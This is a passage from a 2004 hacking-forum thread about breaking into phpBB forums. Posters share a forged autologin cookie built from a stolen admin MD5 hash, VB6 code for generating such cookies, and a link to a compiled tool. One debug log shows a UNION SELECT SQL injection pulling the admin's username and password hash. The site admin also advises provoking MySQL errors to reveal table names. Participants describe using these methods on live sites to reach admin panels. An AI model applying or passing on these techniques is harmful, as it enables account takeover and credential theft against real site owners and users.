 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Fri Jun 11, 2004 5:30 pm |
 |
|
| dotcomBOT |
| Regular user |
 |
|
| Joined: Jun 11, 2004 |
| Posts: 12 |
|
|
|
 |
|
 |
|
thanks dude
u rule  |
|
|
|
|
 |
Help me |
 |
| Posted: Fri Jun 18, 2004 12:38 pm |
|
|
| Ice5 |
| Beginner |
|
|
| Joined: Jun 18, 2004 |
| Posts: 1 |
|
|
|
|
|
|
|
hello dear waraxe
i have one md5 admin hash & userid forum phpbb site:
f21a16bfd4131f63c685895eddd21e8b
userid: 47
i have use mozila browser. first i clean all cookie and then login in one phpbb forum by user register level. then close mozilla and edit cookies.txt with admin md5 hash and save that.
| Code: | # HTTP Cookie File
# http://www.netscape.com/newsref/std/cookie_spec.html
# This is a generated file! Do not edit.
# To delete cookies, use the Cookie Manager.
www.xxx.com FALSE / FALSE 1119181960 phpbb2xxx_data a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22f21a16bfd4131f63c685895eddd21e8b%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%2247%22%3B%7D |
then open mozilla 1.6 browser and load to phpbb site , but i see load that forum with quest user  and i'm not loging with admin level.
please tell me where do i mistake. i want to know if the admin should be loged on the forum, so that i can login with the admin user and accsess level ?
sorry for poor english 
regards , bye |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 18, 2004 3:53 pm |
|
|
| BCW |
| Regular user |
|
|
| Joined: Jun 05, 2004 |
| Posts: 5 |
|
|
|
|
|
|
|
| wow . that problem is mine too . for example I used this way to hack into a site and it worked , but next time ((about 1 min later)) that i wanted to use in again . it requested me u/p of my username |
|
|
|
|
|
a |
|
| Posted: Sat Jun 19, 2004 8:25 pm |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
Try FireFoX 
maybe site have some protection.. |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Tue Jun 22, 2004 7:49 pm |
|
|
| 5y573m f41lur3 |
| Regular user |
|
|
| Joined: May 25, 2004 |
| Posts: 9 |
|
|
|
|
|
|
|
I think that the SID have something to do with it... I have tried this in my localhost and it works... but when I try it in my online phpbb forum it doesnt...
A friend sent me his IE cookies of a phpbb forum, and when I used them, it worked perfectly... guess that there is an extra info in the cookies that we need to state... |
|
|
|
|
|
|
|
|
| Posted: Wed Jun 23, 2004 9:40 am |
|
|
| reese |
| Beginner |
|
|
| Joined: Jun 23, 2004 |
| Posts: 2 |
|
|
|
|
|
|
|
yea it works make sure your using mozilla as the browser and if your having problems with the cookie ive made a little prog that allows u to create the cookie if u have the md5 hash and the user #
http://the-4um.com/cookielove.exe
| Code: | Dim uidsize As String
Dim uid As String
Dim md5hash As String
Private Sub Command1_Click()
uid = Text1.Text
uidsize = Len(uid)
md5hash = Text2.Text
Text3.Text = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22" + md5hash + "%22%3Bs%3A6%3A%22userid%22%3Bs%3A" + uidsize + "%3A%22" + uid + "%22%3B%7D"
End Sub |
or u can compile my whole 8 lines of code using vb6 |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 25, 2004 7:55 am |
|
|
| terrible one |
| Regular user |
|
|
| Joined: Jun 25, 2004 |
| Posts: 10 |
|
|
|
|
|
|
|
ok this works fine but when i try it on a site that has the blend portal system it loggs me in as the person on the portal page but when i try to go to the admininstration panel or anywhere else on the site it asks me to logg in again? how can i get around this so i can access the admin panel?
oh by the way nice work on t-c reese  |
|
|
|
|
| Posted: Fri Jun 25, 2004 6:58 pm |
|
|
| reese |
| Beginner |
|
|
| Joined: Jun 23, 2004 |
| Posts: 2 |
|
|
|
|
|
|
|
| lol i got stalkers but yea it works on blend for me.. but if u notice in your cookies there are 2 seperate cookies for the site or there was in my last attempt on one... make sure both cookies match and dont be fuckin wit connies site or yea |
|
|
|
|
| Posted: Fri Jun 25, 2004 9:26 pm |
|
|
| terrible one |
| Regular user |
|
|
| Joined: Jun 25, 2004 |
| Posts: 10 |
|
|
|
|
|
|
|
| ok this still isnt working. i can access the home page under the owners name but when i go to anything else like viewtopic or the admin panel it asks me to login again. and im not getting 2 cookies like u said u did reese. do ya think u could paste the 2 cookies here? |
|
|
|
|
| Posted: Sun Jun 27, 2004 8:59 pm |
|
|
| kranium |
| Regular user |
|
|
| Joined: Jun 27, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
well thx for your help, u rule
but one little question. I was trying using your knowledge but I've got this error:
| Quote: | | SQL Error : 1146 Table 'lusodemo.phpbb_users' doesn't exist |
so it sems that this guys have some kind of prefix in their tables, and i can't figure it out
so, i ask if there's any way i can get the correct table (or the table list) of this forum, maybe using a SHOW TABLES (i tried it without success)...
if you can help with some magic query i'll be very gratefull
sorry my bad english and keep your excelent work |
|
|
|
|
|
|
|
|
| Posted: Mon Jun 28, 2004 1:59 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Well, you have sql injection case allready, if you see that error message. So try now to provoke various mysql error messages, and maybe one of them will reveal real table name...
| kranium wrote: | well thx for your help, u rule
but one little question. I was trying using your knowledge but I've got this error:
| Quote: | | SQL Error : 1146 Table 'lusodemo.phpbb_users' doesn't exist |
so it sems that this guys have some kind of prefix in their tables, and i can't figure it out
so, i ask if there's any way i can get the correct table (or the table list) of this forum, maybe using a SHOW TABLES (i tried it without success)...
if you can help with some magic query i'll be very gratefull
sorry my bad english and keep your excelent work |
|
|
|
|
|
|
|
|
|
| Posted: Mon Jun 28, 2004 6:08 pm |
|
|
| kranium |
| Regular user |
|
|
| Joined: Jun 27, 2004 |
| Posts: 7 |
|
|
|
|
|
|
|
| waraxe wrote: | Well, you have sql injection case allready, if you see that error message. So try now to provoke various mysql error messages, and maybe one of them will reveal real table name...
|
well I was very duhhh
just above that statment, there was a debug log, and there i simply found "phpbb_2_users" as the correct database
thanks for your help |
|
|
|
|
| Posted: Mon Jun 28, 2004 10:41 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Nice! I'm happy to help ya |
|
|
|
|
|
|
|
|
| Posted: Fri Jul 16, 2004 1:31 pm |
|
|
| TREY |
| Beginner |
|
|
| Joined: Jun 02, 2004 |
| Posts: 2 |
|
|
|
|
|
|
|
anyway to get past this
| Code: | Could not query private message post information
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 185 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 185 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 247
File : /home/*****/public_html/forum/privmsg.php |
|
|
|
|
|
|
|
|
|
| Posted: Fri Jul 16, 2004 2:33 pm |
|
|
| Holish |
| Beginner |
|
|
| Joined: Jun 04, 2004 |
| Posts: 1 |
|
|
|
|
|
|
|
hi,
i've got the same problem as kanium, but no helpful debug message in my case.
| Quote: | Could not query private message post information
DEBUG MODE
SQL Error : 1146 Table '******_phpbb2.phpbb_users' doesn't exist |
I've tried multiple possibilities just like phpbb_user, phpbb2_users, phpbb2_user and so on, but the real prefix seems to be different.
are there some queries which give helpful information to find the prefix?
thank you and keep on rocking 
p.s. sorry for my english, i'm from germany *g* |
|
_________________
Save the whales. Feed the hungry. Free the mallocs. |
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 2 of 5
Goto page Previous1, 2, 3, 4, 5Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 60
Members: 0
Total: 60
